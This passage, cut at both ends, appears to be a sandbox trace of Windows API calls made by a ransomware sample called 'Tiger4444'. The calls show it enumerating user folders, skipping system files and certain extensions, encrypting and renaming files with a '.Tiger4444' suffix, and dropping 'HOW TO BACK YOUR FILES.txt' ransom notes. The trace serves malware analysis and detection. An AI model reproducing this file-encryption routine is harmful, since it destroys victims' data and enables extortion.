(lpString1="-WBD.pptx", lpString2="Tiger4444") returned 1 [0048.055] lstrlenW (lpString=".dll") returned 4 [0048.055] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0048.055] lstrlenW (lpString=".lnk") returned 4 [0048.055] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0048.055] lstrlenW (lpString=".ini") returned 4 [0048.055] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0048.055] lstrlenW (lpString=".sys") returned 4 [0048.055] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0048.055] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\y6ubXI-WBD.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\y6ubxi-wbd.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0048.056] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0048.056] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13950873275) returned 1 [0048.056] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=21039) returned 1 [0048.056] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0048.056] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0048.056] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5530, lpName=0x0) returned 0x2c8 [0048.056] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5530) returned 0xbe0000 [0048.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0048.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0048.057] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0048.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0048.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0048.057] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0048.057] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0048.057] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0048.057] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13951008570) returned 1 [0048.057] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0048.057] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0048.057] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.057] CloseHandle (hObject=0x2c8) returned 1 [0048.057] CloseHandle (hObject=0x260) returned 1 [0048.058] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\y6ubXI-WBD.pptx.Tiger4444") returned 91 [0048.058] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\y6ubXI-WBD.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\y6ubxi-wbd.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\y6ubXI-WBD.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\y6ubxi-wbd.pptx.tiger4444"), dwFlags=0x1) returned 1 [0048.059] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=21040 | out: Addend=0xc6f980) returned 23642224 [0048.059] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 5144 [0048.059] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb596c7a0, ftCreationTime.dwHighDateTime=0x1d4cc4e, ftLastAccessTime.dwLowDateTime=0x63a5680, ftLastAccessTime.dwHighDateTime=0x1d4c773, ftLastWriteTime.dwLowDateTime=0x63a5680, ftLastWriteTime.dwHighDateTime=0x1d4c773, nFileSizeHigh=0x0, nFileSizeLow=0x522f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y6ubXI-WBD.pptx", cAlternateFileName="Y6UBXI~1.PPT")) returned 0 [0048.059] FindClose (in: hFindFile=0xc73148 | out: hFindFile=0xc73148) returned 1 [0048.059] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.059] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0048.059] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0048.059] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0048.061] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.061] CloseHandle (hObject=0x260) returned 1 [0048.061] CloseHandle (hObject=0x2ac) returned 1 [0048.061] GetCurrentThreadId () returned 0xfa8 [0048.061] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0048.061] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Desktop", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0048.061] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc67b80 | out: hHeap=0xc50000) returned 1 [0048.061] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0048.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Desktop" | out: lpString1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0048.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0048.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Desktop\\.BFC0E91B00AE8A0620D3" [0048.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\desktop\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0048.324] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0048.329] FlushFileBuffers (hFile=0x2ac) returned 1 [0048.331] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.332] CloseHandle (hObject=0x2ac) returned 1 [0048.333] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop") returned 23 [0048.333] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.333] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x81ab0c8c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x81ab0c8c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0048.333] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.333] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.333] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0048.333] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.333] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x81ab0c8c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x81ab0c8c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.333] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.333] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.333] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0048.333] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.333] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.333] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x81ab0c8c, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x81ab0c8c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x81d3930b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.333] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.333] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.333] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc406df20, ftCreationTime.dwHighDateTime=0x1d4d494, ftLastAccessTime.dwLowDateTime=0xb5e296b0, ftLastAccessTime.dwHighDateTime=0x1d4cf0c, ftLastWriteTime.dwLowDateTime=0xb5e296b0, ftLastWriteTime.dwHighDateTime=0x1d4cf0c, nFileSizeHigh=0x0, nFileSizeLow=0x24d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3-C44ag206r7-7a-u.jpg", cAlternateFileName="3-C44A~1.JPG")) returned 1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="Tiger4444.exe") returned -1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2=".") returned 1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="..") returned 1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="windows") returned -1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="bootmgr") returned -1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="pagefile.sys") returned -1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="boot") returned -1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="ids.txt") returned -1 [0048.333] lstrcmpiW (lpString1="3-C44ag206r7-7a-u.jpg", lpString2="NTUSER.DAT") returned -1 [0048.333] lstrcpyW (in: lpString1=0x30aead8, lpString2="3-C44ag206r7-7a-u.jpg" | out: lpString1="3-C44ag206r7-7a-u.jpg") returned="3-C44ag206r7-7a-u.jpg" [0048.334] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3-C44ag206r7-7a-u.jpg", dwFileAttributes=0x0) returned 1 [0048.334] lstrlenW (lpString="3-C44ag206r7-7a-u.jpg") returned 21 [0048.334] lstrlenW (lpString="Tiger4444") returned 9 [0048.334] lstrcmpiW (lpString1="-7a-u.jpg", lpString2="Tiger4444") returned -1 [0048.334] lstrlenW (lpString=".dll") returned 4 [0048.334] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.334] lstrlenW (lpString=".lnk") returned 4 [0048.334] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.334] lstrlenW (lpString=".ini") returned 4 [0048.334] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.334] lstrlenW (lpString=".sys") returned 4 [0048.334] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.334] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3-C44ag206r7-7a-u.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\3-c44ag206r7-7a-u.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0048.334] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0048.334] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13978727785) returned 1 [0048.334] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=9431) returned 1 [0048.334] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0048.334] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0048.334] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x27e0, lpName=0x0) returned 0x2c8 [0048.334] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x27e0) returned 0xbe0000 [0048.335] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0048.335] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0048.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0048.335] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0048.335] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0048.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0048.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0048.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0048.335] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13978844010) returned 1 [0048.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0048.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0048.335] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.336] CloseHandle (hObject=0x2c8) returned 1 [0048.336] CloseHandle (hObject=0x260) returned 1 [0048.336] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\3-C44ag206r7-7a-u.jpg.Tiger4444") returned 55 [0048.336] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\3-C44ag206r7-7a-u.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\3-c44ag206r7-7a-u.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\3-C44ag206r7-7a-u.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\3-c44ag206r7-7a-u.jpg.tiger4444"), dwFlags=0x1) returned 1 [0048.337] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=9440 | out: Addend=0xc6f980) returned 23663264 [0048.337] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 5145 [0048.337] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeeaabe0, ftCreationTime.dwHighDateTime=0x1d4ca25, ftLastAccessTime.dwLowDateTime=0xcfb27bc0, ftLastAccessTime.dwHighDateTime=0x1d4c81b, ftLastWriteTime.dwLowDateTime=0xcfb27bc0, ftLastWriteTime.dwHighDateTime=0x1d4c81b, nFileSizeHigh=0x0, nFileSizeLow=0x77d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3htk4ngR.wav", cAlternateFileName="")) returned 1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="Tiger4444.exe") returned -1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2=".") returned 1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="..") returned 1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="windows") returned -1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="bootmgr") returned -1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="pagefile.sys") returned -1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="boot") returned -1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="ids.txt") returned -1 [0048.337] lstrcmpiW (lpString1="3htk4ngR.wav", lpString2="NTUSER.DAT") returned -1 [0048.337] lstrcpyW (in: lpString1=0x30aead8, lpString2="3htk4ngR.wav" | out: lpString1="3htk4ngR.wav") returned="3htk4ngR.wav" [0048.337] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3htk4ngR.wav", dwFileAttributes=0x0) returned 1 [0048.337] lstrlenW (lpString="3htk4ngR.wav") returned 12 [0048.337] lstrlenW (lpString="Tiger4444") returned 9 [0048.337] lstrcmpiW (lpString1="k4ngR.wav", lpString2="Tiger4444") returned -1 [0048.337] lstrlenW (lpString=".dll") returned 4 [0048.337] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0048.337] lstrlenW (lpString=".lnk") returned 4 [0048.337] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0048.337] lstrlenW (lpString=".ini") returned 4 [0048.337] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0048.337] lstrlenW (lpString=".sys") returned 4 [0048.337] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0048.337] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3htk4ngR.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\3htk4ngr.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0048.338] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0048.338] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13979067525) returned 1 [0048.338] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=30675) returned 1 [0048.338] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0048.338] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0048.338] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7ae0, lpName=0x0) returned 0x2c8 [0048.338] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7ae0) returned 0xbe0000 [0048.339] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0048.339] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0048.339] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0048.339] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0048.339] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0048.339] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0048.339] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0048.339] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0048.339] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13979221445) returned 1 [0048.339] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0048.339] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0048.339] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.340] CloseHandle (hObject=0x2c8) returned 1 [0048.340] CloseHandle (hObject=0x260) returned 1 [0048.340] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\3htk4ngR.wav.Tiger4444") returned 46 [0048.340] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\3htk4ngR.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\3htk4ngr.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\3htk4ngR.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\3htk4ngr.wav.tiger4444"), dwFlags=0x1) returned 1 [0048.341] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=30688 | out: Addend=0xc6f980) returned 23672704 [0048.341] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 5146 [0048.341] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c1f3a30, ftCreationTime.dwHighDateTime=0x1d4cb13, ftLastAccessTime.dwLowDateTime=0xc2966ed0, ftLastAccessTime.dwHighDateTime=0x1d4c765, ftLastWriteTime.dwLowDateTime=0xc2966ed0, ftLastWriteTime.dwHighDateTime=0x1d4c765, nFileSizeHigh=0x0, nFileSizeLow=0x8b9a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5j3J4t3qofV.wav", cAlternateFileName="5J3J4T~1.WAV")) returned 1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="Tiger4444.exe") returned -1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2=".") returned 1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="..") returned 1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="windows") returned -1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="bootmgr") returned -1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="pagefile.sys") returned -1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="boot") returned -1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="ids.txt") returned -1 [0048.341] lstrcmpiW (lpString1="5j3J4t3qofV.wav", lpString2="NTUSER.DAT") returned -1 [0048.341] lstrcpyW (in: lpString1=0x30aead8, lpString2="5j3J4t3qofV.wav" | out: lpString1="5j3J4t3qofV.wav") returned="5j3J4t3qofV.wav" [0048.341] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5j3J4t3qofV.wav", dwFileAttributes=0x0) returned 1 [0048.341] lstrlenW (lpString="5j3J4t3qofV.wav") returned 15 [0048.341] lstrlenW (lpString="Tiger4444") returned 9 [0048.341] lstrcmpiW (lpString1="3qofV.wav", lpString2="Tiger4444") returned -1 [0048.341] lstrlenW (lpString=".dll") returned 4 [0048.341] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0048.341] lstrlenW (lpString=".lnk") returned 4 [0048.341] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0048.341] lstrlenW (lpString=".ini") returned 4 [0048.341] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0048.341] lstrlenW (lpString=".sys") returned 4 [0048.341] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0048.341] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5j3J4t3qofV.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\5j3j4t3qofv.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0048.342] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0048.342] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13979472068) returned 1 [0048.342] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=35738) returned 1 [0048.342] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0048.342] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0048.342] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, 